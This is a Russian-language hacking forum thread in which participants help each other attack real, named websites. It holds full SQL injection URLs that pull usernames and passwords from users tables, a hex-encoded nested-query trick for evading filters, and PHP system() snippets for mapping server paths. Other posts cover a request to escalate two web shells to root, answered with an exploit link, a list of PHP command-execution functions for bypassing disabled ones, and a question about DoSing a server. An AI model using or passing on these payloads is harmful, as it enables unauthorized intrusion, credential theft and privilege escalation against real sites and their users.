Ваши вопросы по уязвимостям.

Бля почему бенчмарком не задосить серв ?

И ещё вопрос: как тут обойти фильтрацию ? перепробывал уже всё,но даже ошибку при запросе к мускулу выдаёт одну и ту же.

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,char(117),char(115),char(114),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&lng=en

Удалось вывести только юзера, базу и версию(4.1 кстати).Пробывал и чар, и юрлкодирвоание,и аес, хекс - по нулям )(. Мошь есть у кого варианты что делать тут ?)

 

может я конечно ошибаюсь. но....

Code:

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+1,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en

 

абалдеть.....как я так мимо пройти мог ппц:Р.Ничё бля не закодировано, а выдаёт какую-то левую ошибку.)(

 

Велемир, только твой мат удерживает от того, чтобы добавить тебе репутацию.

 

А к чему &lng=en, у тебя стоит коментарий /* и все что после него пишеться будет просто опускаться.

 

просто я от ссылки Велемир-а отталкивался.

Code:

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=ru

сравни эти две ссылки поменял токо окончание с en на ru.
после /* опускаются как ты сказал, все в запросе mysql. но не как не все параметры GET.

 

Каким скриптом на php или perl можно воспользоваться, чтобы выяснить серверные пути.
Например /var/vadim/www/ и /var/orlusha/ чтобы выводился список каталогов.

 

Гы)))) Ну без мата не могуЮ такая моя пошлая натура сложилась :Р(.Мя позабавило то, что там обрезается длина вывода ))).Субстринг решает

 

аля пхп вроде так)
<?
system(pwd);
?>

ну или system(dir) если винда, вроде так)

 

Привет всем

Помогите пожалуйста разобраться,,, вот есть сайт:

www.fasie.ru/index.php?rid=120'

Немогу понять что нужно дальше делать

Если я не ошибаюсь нужно вводить:

HTML:

www.fasie.ru/index.php?rid=-120+union+select+null,null,null*/

Но ошибки всё вылезают и вылезают:

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 63

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/content.inc.php on line 185

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 138

Пробовал делать так:

HTML:

www.fasie.ru/index.php?rid=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ((и тд.....))*/

Теже ошибки......нужно до бесконечности перебирать эти значения ???

Помогите пожалуйста

 

там www.fasie.ru/index.php?rid=-120+union+select+1/*
только вывода я не нашёл .. сайт оч плохо грузится ..

 

Поднятие прав

Имеются 2 шелла, нужно поднять права до рута

1) uid=48(apache) gid=48(apache) groups=48(apache),100(users)
Linux zeus 2.6.18-8.1.4.el5 #1 SMP Thu May 17 03:26:03 EDT 2007 i686 i686 i386 GNU/Linux

2) uid=768443(site) gid=203435(pg587717) groups=203435(pg587717)
Linux nerds 2.4.32-grsec+f6b+gr217+nfs+a32+fuse23+tg+++opt+c8+gr2b-v6.194 #1 SMP Tue Jun 6 15:52:09 PDT 2006 i686 GNU/Linux

Help.

 

TheSoul 2ое врядли, во первых gr secured, во вторых однно из последних 2.;.* ветки

а первое сопкойно рутается http://milw0rm.com/exploits/5092

 

вывод есть как я понял только если использовать двойной запрос, т.е. внутри этого запроса использовать еще один запрос, все неудобство в том, что кавычки экранируются, и приходится этот второй запрос переводить в hex вобщем вот:

Code:

http://www.fasie.ru/index.php?rid=120+union+select+0x2D3120756E696F6E2073656C65637420312C322C76657273696F6E28292C342C352C362C372C382C392C31302C31312C3132+limit+1,1/*

видим в заголовке страницы версию

фактически запрос выглядит так:

Code:

120 union select '-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12' limit 1,1/*

 

Функция зпрещена. Можно это обойти?

 

Для выполнения, насколько я помную, должены стоять с обоих сторон команды `` (обратный апостроф, находится там же где и тильда).

 

обратный апостроф это в перле =\
print `uname`
хотя может и в пшп есть, я хз

Ershik, ещё есть passthru, exec, shell_exec, popen

 

врёте сударь=\
http://ru2.php.net/manual/ru/language.operators.execution.php

обратные ковычки равноценны shell_exec()

ещё есть pcntl_exec и proc_open

 

+toxa+, омг, я не успел отредактировать =)
на самом деле пшп я почти не знаю, вот и наврал)

 

Все нужно по типу:

так и делал. Все запрещено..